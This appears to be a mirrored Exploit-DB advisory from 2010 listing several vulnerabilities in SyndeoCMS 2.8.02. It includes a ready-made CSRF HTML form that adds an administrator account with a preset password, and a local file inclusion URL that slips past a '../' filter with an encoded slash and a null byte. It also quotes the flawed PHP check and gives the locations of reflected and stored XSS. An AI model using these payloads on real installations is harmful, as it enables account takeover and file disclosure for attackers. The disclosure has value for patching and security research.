SyndeoCMS 2.8.02 – Multiple Vulnerabilities (1)

  • 作者: Abysssec
    日期: 2010-09-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14887/
  • '''
    ________ __ ____
     |\/|/ __ \ /\| || |_ \ 
     | \/ | || | /\ | || | |_) |
     | |\/| | || |/ /\ \| || |_ <Day 4 (0day)
     | || | |__| / ____ \ |__| | |_) |
     |_||_|\____/_/\_\____/|____/ 
    
    '''
     
    Title: syndeocms 2.8.02 Multiple Vulnerabilities
    Affected Version : syndeocms <= 2.8.02 
    VendorSite : http://www.syndeocms.org/
     
    Discovery : abysssec.com
    
     
    Description :
     
    This CMS have many critical vulnerability that we refere to some of those here:
     
     
    Vulnerabilites :
    
    1. CSRF - Add Admin Account:
    
    <html>
    <body>
    <form onsubmit="return checkinput(this);" action="index.php?option=configuration&suboption=users&modoption=save_user&user_id=0" name="form" method="POST">
    <input class="textfield" type="hidden"name="fullname" value="csrf"/>
    <input class="textfield" type="hidden"name="username" value="csrf_admin"/>
    <input class="textfield" type="hidden"name="password" value="admin123"/>
    <input class="textfield" type="hidden"name="email" value="csrf@admin.com"/>
    <select name="editor">
    <option value="1" selected="">FCKEditor</option>
    <option value="2">Plain text Editor</option>
    </select>
    <input type="checkbox" checked="" name="initial" value="1"/>
    <input class="textfield" type="hidden" value=""name="sections"/>
    <input type="radio" name="access_1" value="1"/>
    <input type="radio" name="access_2" value="1"/>
    .
    .
    .
    <input type="radio" name="access_15" value="1"/>
    <input type="radio" name="m_access[0]" value="1"/>
    .
    .
    .
    <input type="radio" name="m_access[21]" value="1"/>
    <input class="savebutton" type="submit" name="savebutton" value=" Save"/>
    </form>
    </body>
    </html>
    -------------------------------------
    2. LFI (Local File Inclusion):
    
    http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00
    
    in starnet\core\con_configuration.inc.php file, As you may noticed theme parameter is checked for "../" and could be bypass by with "..%2F":
    line 61-73:
    switch ($modoption) // start of switch
    {
    	case save_css :
    	
    		if (IsSet ($_POST['content']))
    		{
    			$content = $_POST['content'];
    		}
    		
    		if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us.
    		{
    			$filename = "themes/$theme/style.css";
    -------------------------------------
    3. xss:
    in starnet\core\con_alerts.inc.php file "email" parameter when "modoption" is "save_alert":
    http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2
    
    4. stored xss:
    in starnet\core\con_alerts.inc.php file "name" parameter when "modoption" is "save_alert":
    http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert
    ------------------------------